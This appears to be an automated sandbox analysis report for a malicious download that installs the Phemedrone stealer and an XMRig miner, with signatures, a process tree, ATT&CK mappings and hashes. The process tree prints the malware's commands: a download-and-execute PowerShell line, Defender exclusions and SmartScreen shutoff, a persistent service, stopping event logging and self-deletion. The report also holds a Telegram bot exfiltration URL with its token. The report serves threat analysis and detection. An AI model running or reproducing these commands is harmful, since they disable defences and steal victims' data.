Analysis
-
max time kernel
206s -
max time network
206s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
07-08-2024 17:58
General
-
Target
https://drive.usercontent.google.com/download?id=1-cRnsrAF5ik3zZkVKzImZCoVm0Bo07Ly&export=download&authuser=0&confirm=t&uuid=0904a1d0-67f9-428f-88c3-5f5a9dbf2fa2&at=APZUnTUyoxl_j-NXk0_P2Vbr8MK_%3A1723053475737
Malware Config
Extracted
https://drive.usercontent.google.com/u/0/uc?id=1cOfdrYTcndJEY8uHrMnDtqUbkax07UMo&export=download
Extracted
phemedrone
https://api.telegram.org/bot7253527125:AAG2zbXlkuY33BxLSZk2mcohhToET22xkTM/sendDocument
Signatures
-
Phemedrone
An information and wallet stealer written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 9 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Creates new service(s) 2 TTPs
-
Stops running service(s) 4 TTPs
-
Executes dropped EXE 3 IoCs
-
UPX packed file 14 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Suspicious use of SetThreadContext 3 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 6 IoCs
-
Modifies registry class 4 IoCs
-
NTFS ADS 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 55 IoCs
-
Suspicious use of AdjustPrivilegeToken 28 IoCs
-
Suspicious use of FindShellTrayWindow 62 IoCs
-
Suspicious use of SendNotifyMessage 61 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://drive.usercontent.google.com/download?id=1-cRnsrAF5ik3zZkVKzImZCoVm0Bo07Ly&export=download&authuser=0&confirm=t&uuid=0904a1d0-67f9-428f-88c3-5f5a9dbf2fa2&at=APZUnTUyoxl_j-NXk0_P2Vbr8MK_%3A1723053475737"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://drive.usercontent.google.com/download?id=1-cRnsrAF5ik3zZkVKzImZCoVm0Bo07Ly&export=download&authuser=0&confirm=t&uuid=0904a1d0-67f9-428f-88c3-5f5a9dbf2fa2&at=APZUnTUyoxl_j-NXk0_P2Vbr8MK_%3A17230534757372⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {54db796e-fb7c-437d-9364-e4044c379d6a} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" gpu3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2424 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b8cf0ac6-ef55-4a47-be94-f4e1ac23d3a6} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" socket3⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3148 -childID 1 -isForBrowser -prefsHandle 2868 -prefMapHandle 3068 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d18ffbf4-588a-4ccb-9ba8-e4cd8a48cf5e} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2832 -childID 2 -isForBrowser -prefsHandle 3672 -prefMapHandle 3668 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7e16d37-f856-4ada-886e-ed68a327ead9} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4132 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4652 -prefMapHandle 4648 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c049bbe1-eb41-479f-b95f-ed2cab70cf21} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" utility3⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5252 -childID 3 -isForBrowser -prefsHandle 5244 -prefMapHandle 5240 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ebded401-11d6-4e74-848c-8ca71bcaedda} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5392 -childID 4 -isForBrowser -prefsHandle 5400 -prefMapHandle 5408 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {676c4b9f-8ab9-4fca-af6f-6ef56c03025e} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" tab3⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5600 -childID 5 -isForBrowser -prefsHandle 5608 -prefMapHandle 5612 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1220 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c01db2ed-059b-42bc-bfbd-e4d4c73cd754} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" tab3⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3812,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=4160 /prefetch:81⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Wexside3.0\start.bat1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Wexside3.0\start.bat" "1⤵
-
C:\Windows\system32\chcp.comchcp.com 4372⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵
-
-
C:\Windows\system32\findstr.exefindstr /L /I set "C:\Users\Admin\Desktop\Wexside3.0\start.bat"2⤵
-
-
C:\Windows\system32\findstr.exefindstr /L /I goto "C:\Users\Admin\Desktop\Wexside3.0\start.bat"2⤵
-
-
C:\Windows\system32\findstr.exefindstr /L /I echo "C:\Users\Admin\Desktop\Wexside3.0\start.bat"2⤵
-
-
C:\Windows\system32\findstr.exefindstr /L /I pause "C:\Users\Admin\Desktop\Wexside3.0\start.bat"2⤵
-
-
C:\Windows\system32\find.exefind2⤵
-
-
C:\Windows\system32\find.exefind2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "if ('C:\Users\Admin\Desktop\Wexside3.0' -like '*temp*') { exit 1 } else { exit 0 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\net.exenet session2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'; Add-MpPreference -ExclusionPath 'C:\ProgramData'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1cOfdrYTcndJEY8uHrMnDtqUbkax07UMo&export=download', 'C:\Users\Admin\AppData\Local\Temp\support.rar')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\Wexside3.0\rar\UnRAR.exe"C:\Users\Admin\Desktop\Wexside3.0\rar\unrar.exe" x -p34nbGjnngjGn484ngn4nGng34GDG -o+ C:\Users\Admin\AppData\Local\Temp\support.rar C:\Users\Admin\AppData\Local\Temp\sf3g2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\sf3g\drivers.exe"C:\Users\Admin\AppData\Local\Temp\sf3g\drivers.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 10924⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe"C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GHKOKJMF"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GHKOKJMF" binpath= "C:\ProgramData\exsgytkvvovp\ayfvnajiment.exe" start= "auto"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GHKOKJMF"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sf3g\installer.exe"3⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
-
-
-
C:\Windows\system32\PING.EXEping localhost -n 152⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5304 -ip 53041⤵
-
C:\ProgramData\exsgytkvvovp\ayfvnajiment.exeC:\ProgramData\exsgytkvvovp\ayfvnajiment.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.bing.com/search?q=3uu4gi.exe 3uu4gi.exe"1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4896,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=3984 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=3888,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=4860 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=5440,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=5472 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5600,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=5608 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5628,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=5704 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6120,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=6136 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6160,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6252,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=6240 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --field-trial-handle=5444,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --field-trial-handle=6536,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:81⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --field-trial-handle=6680,i,10369132178352108590,11047993562598554317,262144 --variations-seed-version --mojo-platform-channel-handle=6696 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=127.0.6533.89 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=127.0.2651.86 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7fffa9a3d198,0x7fffa9a3d1a4,0x7fffa9a3d1b02⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2220,i,7342151702584451204,13534023629128767981,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1828,i,7342151702584451204,13534023629128767981,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:32⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2148,i,7342151702584451204,13534023629128767981,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4332,i,7342151702584451204,13534023629128767981,262144 --variations-seed-version --mojo-platform-channel-handle=4576 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4332,i,7342151702584451204,13534023629128767981,262144 --variations-seed-version --mojo-platform-channel-handle=4576 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4312,i,7342151702584451204,13534023629128767981,262144 --variations-seed-version --mojo-platform-channel-handle=4836 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe"1⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Query Registry
4Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
71KB
MD5f5d7bf3bf6f6f6127cda3634ba1b6ede
SHA175a176740ccdbf5596c959d94d495eccb35a7775
SHA2564f2b4d748dcc9b9505fa99b8c61b66614ef46f3b5a7f851c0647932000ba3e4a
SHA512638f1813b318fe51403f80fc42109fc81a5a453c6ba421f62f181fd8773a338f725a32aeec7db0542ce14c866166c52fabc70dbdb1aa6797c6f8441fdf7a8214
-
Filesize
944B
MD52e301af5b60731be1319b2f2194ca595
SHA15f8b5745233d4ed85db71960d19ffb5d19100fb9
SHA256c95cd443ea5a74dd41dfceb23e3c2dcf1ced87874a20b534dbc925a2de35e7fd
SHA512ae505d910f0e0be5aaefa5f102720b3cf94c9afddb427c076035976f48b8d68428b79ad8bd5f8ab2d2cf70717cf6498a12a9880c1797ff82c0cb6d91194b8923
-
Filesize
944B
MD53a6bad9528f8e23fb5c77fbd81fa28e8
SHA1f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2
-
Filesize
21KB
MD54e7ac784f84f5e9153040ff3b2159b83
SHA1b11397bc39c7c81227a3afd69005cda383869f46
SHA2560b92db640ec5e925847419e5865bdb7d1ddacefba3f7db47e7c877320a5e4fdd
SHA5129f1138002260a64c49cb8204bb6fb16e32d29ca970e66693398b1a96446e0d3111df30e88976036d6266cdf92f7d260f56c4384eafd6cf11c82748d2ae9db47e
-
Filesize
18KB
MD5e684a73b9c5f17d8837219bfc02f9a26
SHA1f08176472eda1398353d5d51378ac041ac6b289b
SHA256a3c5e43fd56e251170bf36c87b78337955590b7a1a3ec6b770a64cd5c4101142
SHA5127ca034dcc445ac9f6084dfecbf1bb4ba6a18e90066512900ed0972a562f455f4f89f6197d200e823036498e050130f0816ec9281ce80b931bd68c7a5bf704064
-
Filesize
13KB
MD5a524005ca4f4dc784a543f3770e795f5
SHA116e3fd9576ff12b3f3dec62e1f6436d1330f685f
SHA2566a074f55af7c10c41cd1f12593551b52663152e78c0a89ddaee926ead4cb9717
SHA512f6ab58e0bf9a088143b88b1333758429d550309a93f2d9c311d878a6bdf9add2ce8f40efaede56bee9d3471ea6597bb8b8133461b6874f13be934a396d5dd4c3
-
Filesize
7KB
MD5c460716b62456449360b23cf5663f275
SHA106573a83d88286153066bae7062cc9300e567d92
SHA2560ec0f16f92d876a9c1140d4c11e2b346a9292984d9a854360e54e99fdcd99cc0
SHA512476bc3a333aace4c75d9a971ef202d5889561e10d237792ca89f8d379280262ce98cf3d4728460696f8d7ff429a508237764bf4a9ccb59fd615aee07bdcadf30
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
781KB
MD5eca43edec21680a4c20fadd8e0a02dd4
SHA1cbb338b6bbe3ff3ab4069073458ece3cbb1f6b98
SHA25644cc80e1841396b1797554e1da31e022e0e44dbfdbb3209ab980c4c16c18f533
SHA51281a8d80c2acbdc5b6d96df52045f04db85a07012cd29cb6ce2c971d9f8d0db0d402812fc146eb9810b19758075a55c98d1f63a5d48fc681890335152c430ee0a
-
Filesize
2.6MB
MD57ccc1d23fb8184771030e688a3c4baa4
SHA13a80f56d66b051333d90e5bab1f8c9e2129dcce5
